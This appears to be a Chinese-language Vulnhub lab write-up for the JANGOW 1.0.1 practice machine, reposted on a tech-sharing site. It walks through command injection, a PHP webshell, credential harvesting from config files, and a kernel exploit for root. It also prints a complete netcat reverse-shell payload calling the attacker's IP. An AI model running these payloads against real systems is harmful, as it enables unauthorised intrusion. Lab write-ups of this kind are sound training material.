ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

【Vulnhub靶场】JANGOW: 1.0.1

2022-01-24 22:33:19  阅读:401  来源: 互联网

标签:发现 shell 1.0 192.168 端口 JANGOW Vulnhub IP地址 靶机


时隔这么久,终于开始做题了

环境准备

下载靶机,导入到virtualBox里面,这应该不用教了吧
开机可以看到,他已经给出了靶机的IP地址,就不用我们自己去探测了
在这里插入图片描述
攻击机IP地址为:192.168.2.14
靶机IP地址为:192.168.2.16

渗透过程

信息收集

万事第一步,先扫描
在这里插入图片描述
可以看到,靶机目前就只开放了两个端口,一个是21一个是80,首先访问80端口
在这里插入图片描述
发现是有网页的,随便点点,看看有没有能注入或者渗透的点
发现点到Buscar时,页面变得不一样,并且网址出现了可疑的后缀
在这里插入图片描述
我们试着运行一下命令,发现是可以运行命令的
在这里插入图片描述

开始渗透

直接写一句话木马上传

ehco '' >> shell.php

再用蚁剑连接
在这里插入图片描述
发现wordpress文件夹下有一个config.php,里面有数据库的账号密码
在这里插入图片描述
暂时没用,先保存一下,继续查找

在这里插入图片描述
发现html目录下有个backup文件,里面也有账号密码,继续寻找,找到一串md5
在这里插入图片描述
解密出来是这个,不知道有啥意义
在这里插入图片描述

然后用我们找到的两个账号访问他的ftp,发现第一个组账号是没权限,不能登录的,但第二组账号密码可以登录
在这里插入图片描述
但是并没有发现什么有价值的信息,也没有找到flag,猜测flag在root目录下,所以我们现在开始提权

提权

先尝试反弹一个shell过来,通过蚁剑写php反弹shell
在这里插入图片描述

<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.2.14 443 >/tmp/f');?>

我们在攻击机开始监听443端口
在这里插入图片描述
此处必须是443端口才可以反弹成功,别的端口我试了半天,是无法反弹的

再去网站访问这个页面,即可得到shell,再输入

python3 -c 'import pty;pty.spawn("/bin/bash")';

即可得到一个基本可以正常操作的shell

在这里插入图片描述
输入 su jangow2 即可切换用户
输入 uname -a 可以得到靶机的版本,发现版本号为4.4.0-31
在这里插入图片描述
我们去kali搜索这个版本可能存在的漏洞,发现三个可用的漏洞
在这里插入图片描述
我们把45010.c上传到 /home/jangow01目录下
在这里插入图片描述

上传好之后使用gcc编译一下,再运行就可以得到root权限,然后就可以得到flag了
在这里插入图片描述
在这里插入图片描述

标签:发现,shell,1.0,192.168,端口,JANGOW,Vulnhub,IP地址,靶机
来源: https://www.cnblogs.com/dgs1mple/p/15841145.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有